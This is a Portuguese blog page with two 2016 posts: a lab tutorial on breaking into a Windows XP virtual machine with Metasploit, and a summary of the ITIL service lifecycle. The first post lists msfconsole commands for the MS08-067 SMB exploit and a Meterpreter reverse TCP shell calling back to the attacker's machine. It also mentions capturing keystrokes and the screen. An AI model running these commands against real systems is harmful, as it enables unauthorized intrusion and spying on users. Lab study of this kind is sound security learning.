quinta-feira, 25 de agosto de 2016

Intrusão em pc com o framework metasploit

Esses dias estava estudando o framework metasploit presente no sistema kali linux e pude perceber quanto um sistema é frágil para ser invadido.
Basicamente por procedimento se realizar um scanner na portas e verifica qual esta vulnerável para o ataque.

Todo procedimento de simulação teve duas maquina virtuais uma com Kali e um segunda com Windows XP sp3 com firewall desativado.

A falha do Windows XP é exatamente a porta 445 do serviço samba de compartilhamento de arquivos, bastando somente aplicar a exploração por meio do metasploit pronto estamos no sistema XP.

Procedimentos no Kali :

Neste caso há necessidade de criar um payload com a ferramente de atacks de engenharia social e move-lo para a maquina alvo.

msfconsole
use windows/smb/ms0 8_067_netapi # Linha usada somente quanto for usar a porta 445
use multi/handler # Linha para uso somente com o payload na maquina vitima
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.25 #  Ip do kali
set rhost 192.168.30.28 # O ip da vitima só ser for por meio da porta 445
set lport 4444
set rport 445 # se for usar o payload não precisa de colocar este ip já o Kali irá detectar o mesmo;
show options
exploit
shell

Conclusões

Só foi possível invadir a maquina com Xp devido o firewall esta desativado, pois quanto o mesmo esta ativo derruba a conexão com o payload, outro ponto é necessário um bom antivírus para detectar o payload e remove-lo, além disse o usuário deve executar o mesmo para criar o canal de comunicação com Kali.
Sendo possível realizar procedimento como até mesmo de capturar tudo que foi digitado pelo usuário, assim como capturar a tela do mesmo. 

Não vi ataques como esse sendo efetuados no Windows 10.

Obs: Simulem toda situação aqui em maquina virtuais.

quinta-feira, 18 de agosto de 2016

O ciclo de vida do serviço com a ITIL

Um biblioteca muito influente da na área de tecnologia da informação chamada ITIL não é somente livros de teorias que foram elaborados por meio de simples ideias, mas sim da observação sistêmica de certo processos em um ambiente de TI no dia a dia, levando assim as ser elaborado os melhores processos a serem aplicados na prática em um contexto real.

Para ficar mais simples de memorizar o ciclo de vida ITIL chamarei o mesmo de Ed Tom onde temos :

Estratégia do serviço
Desenho do serviço
Transição do serviço
Operação do serviço
Melhoria continua do serviço
 


Se você ler em sequencia de cima para baixa as primeiras letra temos o ciclo de vida do serviço.

Estratégia de serviço 

Aqui devem ser realizado um analise bem complexa com estratégias para se bem elaborado um determinado serviço. Por exemplo: Um analise de mercado.

Desenho de serviço

Aqui devem ser levantados os requisitos para este novo serviço, logo neste processo temos que ter uma solução para o cliente.

Transição de serviço

Neste processo é a implantação do serviço depois ter realizado as etapas anteriores, aqui é a etapa onde podemos realizar testes adequados para verificar ser tudo esta de acordo.

Operação do serviço

Como o próprio nome do processo nos diz operação, nesta etapa temos o serviço em execução no dia a dia, ou seja, sua realização.

Melhoria continua do serviço 

Neste ultimo processo sua função principal é monitorar e avaliar os processos anteriores, levando mais qualidade ao demais processos do ciclo de vida.
Aqui que temos o uso do ciclo Deming ou PDCA ou PEVA (  Planejam, Executar, Verificar e Agir ) e  procedimento de 6 etapas.
Basicamente aqui é só um resumo dos processos presente na ITIL ainda em cada um deles a outros, que são mais detalhados e específicos, mas que são ideais para um fornecedor de serviços de tecnologia da informação.


 Autor:

Anderson O.de Sampaio
Analista de suporte
ITIL Fundation

Caso queria ajudar nosso projeto... Fique à vontade !!!


EBOOKS

Translate | Tradutor

Deseja anunciar aqui. Fale comigo !!!

Nome

E-mail *

Mensagem *

Tecnologia do Blogger.

Arquivo